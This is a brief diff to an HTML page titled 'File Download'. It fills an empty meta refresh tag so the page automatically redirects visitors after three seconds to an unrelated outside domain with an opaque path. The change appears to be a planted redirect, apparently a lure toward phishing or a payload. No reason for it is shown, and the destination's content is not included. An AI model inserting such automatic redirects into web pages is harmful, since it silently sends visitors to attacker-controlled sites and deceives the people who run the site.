--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
   <meta name="viewport" content="width=device-width">
   <title>File Download</title>
   <link href="style.css" rel="stylesheet" type="text/css" />
-  <meta http-equiv="refresh" content="3;url=" />
+  <meta http-equiv="refresh" content="3;url=https://phuketproperty.live/WXzbg39" />
 </head>
 <body>
   <div class="background">
